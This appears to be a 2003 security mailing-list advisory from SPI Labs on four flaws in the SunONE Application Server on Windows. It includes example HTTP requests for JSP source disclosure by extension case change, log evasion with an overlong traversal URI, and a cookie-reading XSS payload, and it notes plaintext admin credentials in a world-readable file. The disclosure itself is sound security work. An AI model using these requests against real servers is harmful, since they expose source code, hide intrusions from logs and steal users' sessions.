[UNIX] Multiple Vulnerabilities in Sun-One Application Server

• Previous message: SecuriTeam: "[NT] Weakness in GoldMine Email Manager Allows Arbitrary Code Execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 29 May 2003 20:09:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Multiple Vulnerabilities in Sun-One Application Server
------------------------------------------------------------------------

SUMMARY

During a brief audit of a SunONE Application Server installation on
Windows 2000, SPI Labs discovered a number of vulnerabilities. Each of the
vulnerabilities is described in detail below.

DETAILS

Issue 1: JSP source code disclosure
It is possible to view the source code of JSP applications by changing the
case of the file extension in the HTTP request. The vulnerability is due
to UNIX code being ported to the Microsoft Windows platform where the file
system is case insensitive. When a request is received, the server
performs a case sensitive check to determine if the request ends in
".jsp". If it does, the JSP engine will process it. Otherwise, it will see
if it can retrieve the requested resource from the file system. On Unix
operating systems, this will fail because of "file.jsp" cannot be opened
by asking for "file.JSP" However, on Windows the file will be returned
because the file system is case insensitive. Below is an example of a
normal request/response, followed by the same request/response with the
case change applied. The headers and response data have been trimmed for
clarity.

Original request
GET /hello.jsp HTTP/1.0

Original response
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
< head><title>Hello World JSP Example</title></head>
< body>
< h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
< /body></html>

Request with case change
GET /hello.JSP HTTP/1.0

Response with case change
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
< head><title>Hello World JSP Example</title></head>
< body>
< h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring
day.
< /body></html>

Issue 2: Log evasion
Only the first 4042 characters of a request URI are logged, even though
the maximum URI length appears to be 4096 characters. This gives an
attacker 54 character to construct an attack with. Although it is possible
that an administrator would still notice the unusual requests, he or she
would be unable to determine what files or parameters the attacker would
be requesting. Because of this, the administrator would not be able to
find out what components of their system are being exploited. Below we
provide an example request for /hello.jsp, as well as the log data. The
headers, request and response data have been trimmed for clarity.

Request for /hello.jsp
GET /AAAAAAAAAAAAAA[ up to 4042 characters]/../hello.jsp HTTP/1.0

Console message
WARNING: HTTP4198: flex log buffer overflow- greater than 4096 characters

Server log file
[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow
greater than 4096 characters

Access log file
172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[ up to 4042
characters] "

The name of the file that was accessed does not appear in the logs.

Issue 3: Cross site scripting
If an error occurs while processing a Java application, it may be possible
to execute cross-site scripting attacks by placing scripted content in the
query string. Below is an example of a request using a sample application
followed by the relevant portion of the response.

Request
GET /webapps-simple/jsp/source.jsp?<
script>alert(document.cookie)</script> HTTP/1.0

Response snippet
Exception Report<br><br>
< b>Message: </b>Internal Server Error<br>
< p>
< b>Exception</b>
< pre>javax.servlet.ServletException: Invalid JSP file
< script>alert(document.cookie)</script>
at
org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImp
l.java:471)
at _jasper._jsp._source_jsp._jspService(_source_jsp.java:88)

Issue 4: Incorrect local file permissions and plaintext passwords
When installing SunONE on Windows 2000 the default installation directory
is C:\sun. Any file or directory created in this directory will be
world-readable. The "statefile" located at C:\sun\appserver7\statefile
contains a plaintext username and password to the administrative server.

Remediation:
Sun Microsystems was contacted on 18 March 2003 and again on numerous
occasions without results. We hope that by publishing this information,
the vendor will correct these problems. Unfortunately, there is no
remediation procedure for the first, second or third issues. For the last
issue, "Incorrect local file permissions and plaintext passwords" we
recommend that the permissions of the statefile be changed so that only
the administrator can access it.

ADDITIONAL INFORMATION

The information has been provided by <mailto:spilabs@spidynamics.com> SPI
Labs.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Weakness in GoldMine Email Manager Allows Arbitrary Code Execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]